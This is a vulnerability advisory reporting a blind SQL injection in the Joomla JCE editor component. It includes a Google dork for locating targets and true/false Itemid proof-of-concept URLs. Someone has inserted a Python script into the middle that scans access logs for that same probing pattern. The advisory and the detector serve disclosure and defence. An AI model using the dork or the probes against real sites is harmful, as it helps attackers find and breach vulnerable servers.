===================================================================
joomlacontenteditor (com_jce) Blind SQL Injection Vulnerability |
=================================================================== |
|
Software: joomlacontenteditor (com_jce) |
Vendor: www.joomlacontenteditor.net |
Vuln Type: Blind SQL Injection |
Download link: http://www.joomlacontenteditor.net/downloads/editor/joomla15x/category/joomla-15-2 (check here) |
Author: eidelweiss |
contact: eidelweiss[at]windowslive[dot]com |
Home: www.eidelweiss.info |
Dork: inurl:"/index.php?option=com_jce" |
|
|
References: http://eidelweiss-advisories.blogspot.com/2011/04/joomlacontenteditor-comjce-blind-sql.html |
|
|
=================================================================== |
Description: |
JCE makes creating and editing Joomla!® content easy. |
Add a set of tools to your Joomla!® environment that gives you the power to create the kind of content you want, |
without limitations, and without needing to know or learn HTML, XHTML, CSS... |
=================================================================== |
exploit & p0c |
|
[!] index.php?option=com_jce&Itemid=[valid Itemid] |
|
Example p0c |
|
[!] http://host/index.php?option=com_jce&Itemid=8 <= True |
[!] http://host/index.php?option=com_jce&Itemid=-8 <= False |
|
|
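Detection sketch for the true/false Itemid probing shown above. This is an added example, not part of the original advisory or of JCE. It assumes Apache combined-format access logs; the function name scan() and the sample log lines are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache combined log format (not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [05/Apr/2011:10:00:01 +0000] "GET /index.php?option=com_jce&Itemid=8 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.10 - - [05/Apr/2011:10:00:02 +0000] "GET /index.php?option=com_jce&Itemid=-8 HTTP/1.1" 200 1834 "-" "Mozilla/5.0"
198.51.100.7 - - [05/Apr/2011:10:01:00 +0000] "GET /index.php?option=com_jce&Itemid=12 HTTP/1.1" 200 5090 "-" "Mozilla/5.0"
203.0.113.5 - - [05/Apr/2011:10:02:00 +0000] "GET /index.php?option=com_content&Itemid=-3 HTTP/1.1" 200 900 "-" "Mozilla/5.0"
198.51.100.7 - - [05/Apr/2011:10:03:00 +0000] "GET /index.php?option=com_jce&Itemid=abc HTTP/1.1" 200 5090 "-" "Mozilla/5.0"
"""

# Captures the client address and the request target of each log line.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*"')
INT_RE = re.compile(r"-?\d+")


def scan(log_text):
    """Return {client: sorted findings} for suspicious com_jce Itemid values."""
    seen = defaultdict(lambda: defaultdict(set))  # client -> |Itemid| -> signs seen
    findings = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        client, target = m.group(1), m.group(2)
        query = parse_qs(urlsplit(target).query, keep_blank_values=True)
        if "com_jce" not in query.get("option", []):
            continue  # only the component named in the advisory
        for raw in query.get("Itemid", []):
            if not INT_RE.fullmatch(raw):
                findings[client].add("non-integer Itemid")
                continue
            value = int(raw)
            if value < 0:
                findings[client].add("negative Itemid")
            # Same client asking for N and -N matches the advisory's True/False pair.
            seen[client][abs(value)].add(value >= 0)
            if seen[client][abs(value)] == {True, False}:
                findings[client].add("true/false pair")
    return {client: sorted(found) for client, found in findings.items()}


if __name__ == "__main__":
    for client, found in scan(SAMPLE_LOG).items():
        print(client, found)
```

A legitimate Joomla! Itemid is a non-negative integer menu item id, so any hit is worth reviewing alongside the response sizes for the same client.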
==================================================================== |
|
Nothing Impossible In This World Even Nobody`s Perfect |
|
=================================================================== |
|
==========================| -=[ E0F ]=- |==========================